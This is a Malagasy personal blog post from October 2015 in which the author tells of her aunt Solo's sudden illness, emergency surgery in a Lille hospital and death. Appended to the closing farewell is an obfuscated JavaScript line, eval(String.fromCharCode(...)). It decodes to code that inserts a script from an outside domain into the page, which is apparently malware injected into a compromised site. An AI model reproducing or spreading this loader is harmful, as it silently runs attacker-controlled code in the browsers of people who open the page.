Blaogin’ny Namana Serasera weblog

Archive for Oktobra, 2015

Lasa i Solo e!

Dia tsy hanoratra ve raha tsy hilaza manjo foana izao e! ggrrr inona ary ity tsss

 

Dia akory atao fa dia lasa very namana iray indray izahay aty Lille aloha…… tsy iza moa izany fa i ‘Solo’ izay nenitoako moa izany raha ny rohim-pihavanana no zohiana misy eo aminay nefa dia tsy tena tahaka izay ny fifampitondranay fa tahaka ny mpirahavavy ihany, ary raha taminy sy i Maeva zanako kosa dia tahakan’ny zaza mifanarakaraka izy miafy fa tsy mba nisy ambaratonga teo @ izy ireo.

Somary efa narary ihany izy volana vitsivitsy lasa izay ary nitarika tsy fahafahana miasa izany… Ny alarobia 23/09/2015 izahay dia mbola niaraka niantsena ary tsy dia hitako loatra nisy fiovana izy akoatran’ny hoe tsemboka be izy nefa dia niteny ahy fa tsy maninona loatra fa mbola mikohaka sy mbola misy hafanana aloha @ ilay ngamba misy tazo fa efa nahazo fanafody aloha…, tsy nety nateriko hatrany an-trano izy fa niakatra irery niaraka t@ entany. Izaho moa rehefa maka azy hiantsena dia miantso azy an-tsofin-davitra dia midina izy ary miandry ahy tonga @ fiara aty ivelan’ny trano, ary mazàna rehefa avy miantsena izahay dia tsy mamela ahy hiakatra izy fa tateriko hatreo @ ascenseur ny harona dia iny aho no miverina mody…dia tsy niova t@ izay ny nataonay farany…. indrisy…. tokony niakatra aho….

Ny zoma sy sabotsy manaraka an’io izy dia niantso ahy ary somary nitaraina fa vizaka fa niteny azy aho hoe, mihinana voankazo @ ireny niantsenana ireny fa mila vitamines ianao, sns , ary mila misakafo tsara ihany koa…. efa mihinana aho hoy izy fa ohatran’ny mahatsiaro vizana izany. Tokony nandeha notiliana rà ihany koa izy fa tsy nandeha fa vizana hono ary niantso infirmière ho avy ary @ talata 02/10/15 ny fotoana nomen’io, tokony natao radio ihany koa ny kibony lazainy fa maharary azy fa efa nahazo ordonnance ny @ izay izy fa mbola nangatak’andro ny ho any fa tsy mahavita mandeha hono, dia somary notezerako moa hoe ka maninona no tsy manontany ahy?????; dia teo vao nifandamina ny @ fotoana izahay, ny alatsinainy maraina izy niantso ahy fa tena tsy zakany ny fanaintainana manjo azy @ tongony fa dia mianjerazera foana izy….. Nilaza taminy aho fa ny hariva aho vao malalaka ny ho any fa mbola nisy RDV t@ sekolin’i Maeva.

Nony tonga aho ny hariva tokony ho tà 17h teo ho eo dia tsy tafiditra ny trano (satria aho manana ny fanalahidy ihany koa) dia voatery niantso azy hamoha ahy, tsy henony anefa ny sonnerie, dia nantsoiko t@ finday izy, ary naharitra 5 minitra izy vao tonga namoha varavarana ahy, ary nandritra izay dia in 2 nianjera t@ tany izy, nolazaiko moa izy hoe aza miezaka mitsangana fa mandadiza……

Nony nivoha ny varavarana dia gaga aho nahita azy tsy mahatsangana, ary tonga aho dia niantso ny mpitsabo azy… rehefa tafaresaka taminy aho dia niteny io farany io fa tonga dia mila ampidirina hopitaly maika izy. Rehefa avy niantso ambulance aho dia niteny ity farany fa mila mandoa 70e aho sarany satria tsy manana bon de transport izahay, tsy nanaiky anefa aho fa niverina niantso ny mpitsabo indray ary nangataka io taratasy io, tsy ny mpitsabo anefa no azoko fa ny secretaire ny ary tsy nety hanome ahy hiresaka @ mpitsabo ity farany fa efa niresaka ela hono izahay teo nefa ny olona betsaka no miandry azy ao, ka tsy afaka ny hanome ahy alalana hiresaka @ mpitsabo izy, nolazaiko azy fa mila ttsy ahafahako maka ambulance fotsiny aho dia, eny hoy izy rahampitso izay azonao, tsia hoy aho izao dieny izao ny nolazain’ny mpitsabo teo, narirarirany teo aho fa tonga dia nitongavako tany izy ary azoko ihany ilay ttsy ary niantso ilay ambulance aho dia niaraka tonga izahay.

Nony tonga tany @hôpital izahay dia tonga dia tany @ zone4 n’ny urgence no nampidirana azy izany hoe tena faran’ny maika indrindra, nametrahana fanontaniana maro aho, tahakan’ny hoe: ngah avy nivahiny tany afrika izy, sns…. naharitra ela ny fitiliana tao, natao ny fangalàna rà ny echographie reins sy abdomen,  fa tsy nahitandry zareo inona!!!! nony efa nandroso alina ny andro tokony ho t@ 1 ora maraina teo dia nafindra toerana ho any à déchocage manuel izy ary dia nasaina nody aho fa tsy misy azoko atao eo tsinona.

Nony maraina tokony ho t@ 7h30 teo ho eo dia naneno ny findaiko ary dokotera no tao nanontany ahy hoe aiza ho aiza ny misy ahy….. efa akaiky eto aho hoy aho, fa mametraka fiara dia tonga… miandry anao ary aho hoy izy…., nony tonga aho dia nasaina niandry tao à efitra iray fa hisy mpitsabo hiresaka amiko. Niandry ela tokoa aho satria efa t@ 10 ora mahery tany vao nisy dokotera tonga niresaka tamiko, nanazava ny toe-draharaha…… izaho moa nandritra izay dia nitsanga-nitoetra nijery nanarangarana tety alavitry ny varavarana izay tsy azoko nidirana, izay ahitako irika kely monja ny efitrano nasiana an’i Solo. Nilaza sy nanazava aza io mpitsabo io fa mila fandidiana maika izy fa misy tritra ny aorte izay lalandrà mitondra ny rà mankany à vatana ary tsy afaka ny mankany @ reins sy ny tsinay intsony izay ary dia nahafaty ny reins anankiray ary tsy namelona ny tsinay ihany koa ka lasa mangana ‘nécrosé’ ny tsinainy ary tsy maintsy ho esorina ny simba @ izany, nambarany ihany koa fa ho sarotra ny fandidiana fa mety tsy hifoha @ izany izy nefa mahatoky ny mpandidy isika…..tankina tsy nahateny aho…. ny voalohan’ny tonga tao an-tsaiko dia ny hiantso an’i Tonton Pasy, haka hevitra sy hanoro ahy ny tokony hataoko……i tatie Caro moa no azoko ary nilaza fa hampita ny hafatra, teo no eo moa dia niantso ahy izy, ary niresaka izahay mianaka, nazavaiko azy ny nolazain’ny dokotera tamiko………, ilay dokotera moa mbola niteny ahy fa ho avy hijery ahy ny mpadidy hanazava izay hataao aminy, dia niandry aho ka niandry ary nivezivezy nanoloana ilay varavarana tsy azo hidirana foana, tsikaritr’ilay dokotera niresaka tamiko izany ary nanontany ahy izy raha efa taharesaka tà mpandidy aho, novaliako fa tsy mbola….. dia tonga dia nolazainy aho hiditra haingana ny efitre misy an’i Solo sao ho tara hoy izy fa efa nidina any @ bloc izany ny mpandidy fa sao tara loatra raha mbola hiresaka aminao…..dia akory ny hatairako nahita azy feno milina manodidina azy sy aminy…. fa mody tsy taitra aho satria hitako ny masony manaraka ahy ihany, ny mason’i Solo io, dia mbola nivazivazy taminy aho hoe mahay ny mpitsabo fa tsy misy atahorana fa mbola miverina ianao avy eo fa tsy mijanona any ambany any fa maika aho annnn, sns….. dia izy mamaly ahy moa hoe an an, @ vavany fa tsy afaka miteny intsony izy fa efa misy tube ny vavany, miresaka à maso izahay ary fantatro faa natahotra izy, nolazaiko izy fa miaraka @ Tompo hatrany isika ka tsy misy manahy ny @ izay hitranga, nitsiky izy…….. dia nony afaka 10 minitran’ny firesahanay teo dia nolazaina @ izay aho fa tsy maintsy mandeha ry zareo fa efa miandry ny mpandidy….. dia mbola nanofahofa tanana azy aho…….izy mbola afaka naninga ny rantsan-tanany……… dia izay….

Nidina ny bloc izy tokony ho t@ 14h teo ho eo ary tsy niala tany raha tsy t@ 21h30 tany ho any.

Izaho moa nony nidina izy dia nasaina nody fa tsy navelandry zareo nijanona teo satria tsy fantatra hafiriana ny faharetan’ny fotoana fandidiana…., nolazaiko azy ireo moa fa misy fotoana tsy azo iodivirana aho ny hariva ka avy any aho vao tonga…… I maeva no niantso ilay laharana nomena ahy nanontany ny fizotran’ny fandidiana ka izay no nahafantarana fa t@ 21h30 izy no tafavoaka ny bloc, tokony ho t@ 21h45 teo i Maeva no niantso ny tany fa efa tsy ariny intsony hono hoe tsy misy miantso izahay…. avy teo moa izy niantso ahy dia tonga aho dia nandeha tany @ hopitaly tokony ho t@ 22h30 tany ho any. Nony tonga tany anefa aho dia nolazaina anay fa niova toerana izy fa tsy ao @ déchocage manuel intsony fa any @ déchocage chirurgicale indray, dia nazavaina anay teo ny lalana mankany dia lasa izahay sy José nandeha tany.

Rehefa tonga tany izahay dia tsy tonga dia nahazo niditra fa mbola nazavaina taminay ny natao taminy, izany hoe nesorina ny rein anankiay ilay maty ary nesorina ihany koa ny 3M t@ tsinainy, raha manana 4M @ tsinay isika olombelona, nolazaina taminay fa tsy afaka miaina tsy misy tsinay isika olombelona ka noho izany dia najanona ny 1Metatra ary dia ho jerena @ fandidiana manaraka raha hihaina io na tsia, fa raha sanatria tsy miaina io ao anatin’ny 24H na 48H taorian’io fandidiana voalohany io dia tsy ho fohazina intsony izy……. tankina tsy nahateny aho……… manamboatra saina miandalana ihany koa aho,…

Nahita azy ary izahay……. mila miomana moa rehefa hiditra ny efitra misy azy, izany hoe misasaa tanana tsara @ savony sns, mba tsy hitondra mikroba…. dia akory ny fahatairana fa dia mody tony ihany e!!! milina tsy milina re izao e!!!! fa dia jerena hoe miaina izy dia mionona fa hoe mbola velona izany…..

Niandry ny fandidiana faharoa izany dia natao io ny alakamisy, rehefa avy nazavaina tamiko ny tokony hatao azy, dia ny hoe hitondra poche izy, ary mila ahy eo aaminy hikarakara azy rehefa hivoaka ny hopitaly izy, tsy nanisy olana ny @ izany aho fa tonga dia nekeko. Nidina ny bloc indray izy tokony ho t@ 9h maraina ary tsy niakatra raha tsy t@ 12h30-13h tany ho any, niandry azy tao moa aho satria niasa hariva aho io alakamisy io, niandry azy ny hifoha à izay satria tokony hifoha izy taorian’io fandidiana faharoa io. Tsy mbola nifoha anefa izy talohan’ny niaingako tany, ary dia tsy nistahatry ny niantso aho taty am-piasana mandra-piveriko tany indray ny alina…..tahaka izay ihany koa ny zoma, tsy niasa aho moa fa tany tontolon’andro, niteny ahy ny mpitsabo fa raha tsy mifoha izy dia ny alatsinainy dia hanao scanner/irm ry zareo ahitana ny tsy mety aminy, satria nandritra izay dia natao dialyse izy moa izany, nolazaina ahy ihany koa fa misy olona sasany maharitra vao afaka aminy ny tahan’ny fanafody fampatoriana ampiasaina mandritran’ny fandidiana. Nandritra izay fotoana izay moa dia tsy tapaka aho no miresaka à dadatoa Pasy manome vao² azy, izy rahateo koa efa tafaresaka t@mpitsabo azy, ny sabotsy izy no nandalo nijery azy tany @ hôpital niaraka t@ i Titsy sy Raivo ary i Hoby, nitsodika azy koa i Tiana, i Nanick sy Vavah moa nijery azy ihany koa, tsy adinoina ny mpiara mivavaka tao @ FPMA izay tsy nitandro hasasarana tokoa nifandimby niandry azy teny @ hopitaly, ary indrindra koa i Pastera Miora, izay zoky ray aman-dreny tokoa, nitrotro azy am-bavaka sy nitarika fivavahana ho azy ihany koa….

Tonga ny alatsinainy, izaho moa niasa maraina ka tsy afaka tonga tany fa tsy mitsahatry ny miantso aho nanontany hoe efa nidina natao scanner sns veh , nidina tokoa izy tokony ho t@ 8h-9h teo ho eo, dia niverina niantso aho tokony t@ 11h30 tany ho any nanontany ny valiny, fa nolazaina ahy fa mbola tsy azo izany, namerina niantso aho t@ 15h satria efa hirava, dia nolazaina fa tsy mbola ao aloha. Nambarako aza fa manana rdv any @ kiné aho ka somary ho tara kely vao ho avy, tsy misy olana ny @izay hoy izy fa ndana fa avy eo miandry anao aho hoy ilay mpitsabo azoko…..

Nony efa akaiky ilay toerana hanaovako kiné aho dia naneno ny findaiko ary ilay mpitsabo vao azoko vao teo no teo, nilaza izy fa tsaratsara kokoa raha tonga any izao dieny izao aho raha azo atao satria efa minitra na ora vitsy sisa ahafahako mahita an’i ‘tante’ nao hoy izy, saika tsy hitako ny lalana nombana fa tonga dia nahodiko ny familiana ary nirifatra aho nitodi-doha ho any @ hôpital teny an-dalana aho dia niantso an’i Dolly hiaraka amiko fa matoa ny mpitsabo miantso dia efa tsy izy intsony izay hoy aho, niantso an’i Haja ihany koa aho. Nony tonga aho dia nasaina niditra tahaka ny mahazatra ary nolazaina fa ho avy ny mpitsabo……. ora 1 taty aoriana dia tonga izy ary niteny tamiko fa afaka mankao @ bibliothèque @ izay izahay fa hiresaka, nanaraka azy aho, fa nony tonga tao @ couloir dia iny i Dolly sy Manitra ary i Lydia (Max) sy Liva ary Pastera niaraka nivoaka avy tany, tonga dia nasaiko niaraka niditra niaraka tamiko ry zareo, rehefa vita ny fifampahafantarana anay, dia nandray fitenenana ny mpitsabo, nilaza izy fa novoriana izahay fianakaviana satria nivaly ny scanner natao ny maraina ary hita fa ‘tsy misy activité cérébrale’ intsony izy, tahaka ny mahazatra moa rehefa misy valan-dresaka ataoko @ mpitsabo dia efa mivonona @ ttsy sy stylo aho handray note, fa teo dia tankina aho tsy hitako izay nosoratana, tonga dia dia latsaka tety an-tanako ny stylo ary nofihiniko sy nopotseriko mafy ny tanan’i Manitra sady mbola naka toky t@ mpitsabo aho nanontany hoe inona tsara ny dikan’izany????? dia hoy izy namaly ahy hoe…. ‘elle est morte’…… tsy fantatra hoy izy na ovina na ovina izy no maty na t@ fandidiana voalohany fa taorian’io na t@ fandidiana faharoa na taorian’io fa tsy misy asa intsony ao anatin’ny lohany,…. lasa izy izany……..tankina aho……… efa nitsabo isika hoy izy ary izay ny namindrana azy taty satria mbola tanora izy fa raha ny fahitana azy hatrany am-boalohany raha olona efa voky andro izy dia tsy notohizanay akory ny fitsaboana azy, fa @ naha tanora azy dia nataonay izay rehetra tokony natao nefa indrisy izay no lahatra….. lasa ny alatsinainy 05/10/2015 izy izay,  ny ora napetraka diaa 15h satria izay no nahitana ny valin’ny IRM natao taminy…….

Veloma indrindra e!!!!!!!!!eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


120 comments